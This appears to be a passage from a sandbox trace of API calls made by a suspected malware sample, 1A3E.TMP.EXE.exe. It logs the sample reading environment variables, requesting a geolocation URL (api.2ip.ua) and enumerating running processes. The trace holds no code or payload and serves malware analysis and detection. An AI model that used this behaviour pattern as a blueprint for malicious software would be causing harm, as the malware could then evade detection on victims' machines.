lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0064.234] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x29) returned 0x70b118 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x70b118, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0064.234] GetLastError () returned 0x0 [0064.234] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x60 [0064.234] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x64) returned 0x7112a8 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0064.234] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x70f130 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x70f130, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0064.234] GetLastError () returned 0x0 [0064.234] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x64 [0064.234] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x68) returned 0x7112a8 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0064.234] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x41) returned 0x706c00 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x706c00, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0064.234] GetLastError () returned 0x0 [0064.234] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x68 [0064.234] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x6c) returned 0x7112a8 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0064.234] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x17) returned 0x711320 [0064.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x711320, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0064.234] GetLastError () returned 0x0 [0064.235] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x6c [0064.235] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x70) returned 0x7112a8 [0064.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0064.235] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xf) returned 0x70e698 [0064.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x70e698, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0064.235] GetLastError () returned 0x0 [0064.235] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7112a8) returned 0x70 [0064.235] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7112a8, Size=0x74) returned 0x711340 [0064.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0064.235] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x16) returned 0x7112a8 [0064.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7112a8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0064.235] GetLastError () returned 0x0 [0064.235] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711340) returned 0x74 [0064.235] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711340, Size=0x78) returned 0x711340 [0064.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0064.235] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70b150 [0064.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x70b150, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0064.235] GetLastError () returned 0x0 [0064.235] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711340) returned 0x78 [0064.235] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711340, Size=0x7c) returned 0x711340 [0064.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0064.235] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x29) returned 0x70b188 [0064.235] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x70b188, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0064.235] GetLastError () returned 0x0 [0064.235] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711340) returned 0x7c [0064.235] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711340, Size=0x80) returned 0x711340 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0064.236] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x15) returned 0x7112c8 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x7112c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0064.236] GetLastError () returned 0x0 [0064.236] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711340) returned 0x80 [0064.236] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711340, Size=0x84) returned 0x711340 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0064.236] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1e) returned 0x70f158 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x70f158, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0064.236] GetLastError () returned 0x0 [0064.236] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711340) returned 0x84 [0064.236] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711340, Size=0x88) returned 0x711340 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0064.236] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x2a) returned 0x70b1c0 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x70b1c0, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0064.236] GetLastError () returned 0x0 [0064.236] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711340) returned 0x88 [0064.236] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711340, Size=0x8c) returned 0x711340 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0064.236] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x7112e8 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x7112e8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0064.236] GetLastError () returned 0x0 [0064.236] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711340) returned 0x8c [0064.236] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711340, Size=0x90) returned 0x711340 [0064.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0064.236] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x18) returned 0x7113d8 [0064.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x7113d8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0064.237] GetLastError () returned 0x0 [0064.237] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x711340) returned 0x90 [0064.237] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x711340, Size=0x94) returned 0x7113f8 [0064.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0064.237] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x46) returned 0x706c50 [0064.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x706c50, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0064.237] GetLastError () returned 0x0 [0064.237] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7113f8) returned 0x94 [0064.237] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7113f8, Size=0x98) returned 0x7113f8 [0064.237] GetLastError () returned 0x0 [0064.311] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.311] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.311] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.319] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x8ec) returned 0x711498 [0064.353] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.353] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x10) returned 0x70e6b0 [0064.353] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.353] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.354] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.395] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x710db8) returned 0x80 [0064.402] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0066.686] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x40) returned 0x705328 [0066.686] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0108.168] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x705328 | out: hHeap=0x6f0000) returned 1 [0108.178] GetCurrentProcess () returned 0xffffffff [0108.178] GetLastError () returned 0x2efd [0108.179] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0108.198] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x10) returned 0x71df60 [0108.208] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x8ec) returned 0x753e80 [0108.291] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x800) returned 0x74ca18 [0108.291] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x74ca18, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\1a3e.tmp.exe.exe")) returned 0x36 [0108.291] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0108.324] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x0, Size=0x810) returned 0x754778 [0108.334] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" " [0108.334] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" ", pNumArgs=0x18d6f8 | out: pNumArgs=0x18d6f8) returned 0x7435c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" [0108.335] lstrcpyW (in: lpString1=0x18e388, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" [0108.356] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" " [0108.356] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe\" ", pNumArgs=0x18d694 | out: pNumArgs=0x18d694) returned 0x7435c0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe" [0108.356] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\1A3E.TMP.EXE.exe") returned="1A3E.TMP.EXE.exe" [0108.356] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0108.357] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcesses") returned 0x0 [0108.358] GetProcAddress (hModule=0x76d30000, lpProcName="EnumProcessModules") returned 0x0 [0108.358] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleBaseNameW") returned 0x0 [0108.358] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x77060000 [0108.419] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcesses") returned 0x77061544 [0108.419] GetProcAddress (hModule=0x77060000, lpProcName="EnumProcessModules") returned 0x77061408 [0108.419] GetProcAddress (hModule=0x77060000, lpProcName="GetModuleBaseNameW") returned 0x7706152c [0108.419] EnumProcesses (in: lpidProcess=0x182e90, cb=0xa000, lpcbNeeded=0x18d6a0 | out: lpidProcess=0x182e90, lpcbNeeded=0x18d6a0) returned 1 [0108.423] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0108.423] CloseHandle (hObject=0x0) returned 0 [0108.423] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.424] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0108.424] CloseHandle (hObject=0x0) returned 0 [0108.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0108.425] CloseHandle (hObject=0x0) returned 0 [0108.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0108.425] CloseHandle (hObject=0x0) returned 0 [0108.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0108.425] CloseHandle (hObject=0x0) returned 0 [0108.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0108.425] CloseHandle (hObject=0x0) returned 0 [0108.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0108.425] CloseHandle (hObject=0x0) returned 0 [0108.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc8) returned 0x0 [0108.425] CloseHandle (hObject=0x0) returned 0 [0108.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x11c) returned 0x0 [0108.425] CloseHandle (hObject=0x0) returned 0 [0108.425] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x3ec [0108.425] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 0 [0108.426] CloseHandle (hObject=0x3ec) returned 1 [0108.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x454) returned 0x3ec [0108.426] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 0 [0108.426] CloseHandle (hObject=0x3ec) returned 1 [0108.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x47c) returned 0x0 [0108.426] CloseHandle (hObject=0x0) returned 0 [0108.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4bc) returned 0x0 [0108.426] CloseHandle (hObject=0x0) returned 0 [0108.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3ec [0108.426] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 0 [0108.426] CloseHandle (hObject=0x3ec) returned 1 [0108.426] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x588) returned 0x3ec [0108.426] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 0 [0108.427] CloseHandle (hObject=0x3ec) returned 1 [0108.427] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x598) returned 0x3ec [0108.427] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.428] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x210000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="seekers_judy_worked.exe") returned 0x17 [0108.428] CloseHandle (hObject=0x3ec) returned 1 [0108.428] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90) returned 0x3ec [0108.429] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.430] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1060000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="preservation.exe") returned 0x10 [0108.430] CloseHandle (hObject=0x3ec) returned 1 [0108.430] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x340) returned 0x3ec [0108.430] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.432] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1270000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="suspect.exe") returned 0xb [0108.432] CloseHandle (hObject=0x3ec) returned 1 [0108.432] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x76c) returned 0x3ec [0108.432] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.433] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xf80000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="during_solutions.exe") returned 0x14 [0108.434] CloseHandle (hObject=0x3ec) returned 1 [0108.434] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x3ec [0108.435] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.436] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1390000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="chemicals_experiment.exe") returned 0x18 [0108.436] CloseHandle (hObject=0x3ec) returned 1 [0108.436] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x53c) returned 0x3ec [0108.436] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.438] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0x1370000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="circus.exe") returned 0xa [0108.438] CloseHandle (hObject=0x3ec) returned 1 [0108.438] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x604) returned 0x3ec [0108.438] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, cb=0x4, lpcbNeeded=0x18d690 | out: lphModule=0x18d6ac, lpcbNeeded=0x18d690) returned 1 [0108.439] GetModuleBaseNameW (in: hProcess=0x3ec, hModule=0xf0000, lpBaseName=0x18ce90, nSize=0x400 | out: lpBaseName="echo changing.exe") returned 0x11 [0108.440] CloseHandle (hObject=0x3ec) returned 1 [0108.440] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3ec [0108.440] EnumProcessModules (in: hProcess=0x3ec, lphModule=0x18d6ac, 